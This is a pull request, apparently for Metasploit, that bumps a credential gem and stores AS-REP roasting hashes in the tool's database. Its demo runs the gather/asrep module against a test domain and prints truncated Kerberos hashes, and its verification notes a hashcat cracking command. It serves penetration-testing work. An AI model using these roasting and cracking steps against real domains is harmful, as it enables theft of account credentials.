### PR TITLE
Asrep update

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -310,10 +310,14 @@ GEM
       activesupport (~> 7.0)
       railties (~> 7.0)
       zeitwerk
-    metasploit-credential (6.0.14)
+    metasploit-credential (6.0.16)
+      bigdecimal
+      csv
+      drb
       metasploit-concern
       metasploit-model
       metasploit_data_models (>= 5.0.0)
+      mutex_m
       net-ssh
       pg
       railties


### PR DESCRIPTION
This stores asrep "hashes" into the metasploit DB. Also utilises some of the shared code from #20175.

Requires https://github.com/rapid7/metasploit-credential/pull/190.

## Verification

- [x] ASREP module still works the same
- [x] ASREP hashes are stored in the DB and are accessible with `creds -t krb5asrep-rc4`, and successfully crack (i.e. `hashcat -m 18200 asrep.hcat wordlist`)

## Demo

```
msf6 auxiliary(gather/asrep) > run rhost=20.248.208.9 domain=msf.local password=AzureTesting12345 username=AzureAdmin action=LDAP
[*] Running module against 20.248.208.9

$krb5asrep$23$low.admin@MSF.LOCAL:863262b1faf96e63c3ed2e4159169c0e$4e65...
$krb5asrep$23$no.asreep@MSF.LOCAL:1c82f2ab8ffc90f88b309569d4fee9de$4947...

[+] Query returned 2 results.
[*] Auxiliary module execution completed
msf6 auxiliary(gather/asrep) > creds -t krb5asrep-rc4 -v
...
20.248.208.9  20.248.208.9  389/tcp (Kerberos)          $krb5asrep$23$low.admin@MSF.LOCAL:863262b1faf96e63c3ed2e4159169c0e$4e65...           Nonreplayable hash  krb5asrep-rc4
20.248.208.9  20.248.208.9  389/tcp (Kerberos)          $krb5asrep$23$no.asreep@MSF.LOCAL:1c82f2ab8ffc90f88b309569d4fee9de$4947...         Nonreplayable hash  krb5asrep-rc4
```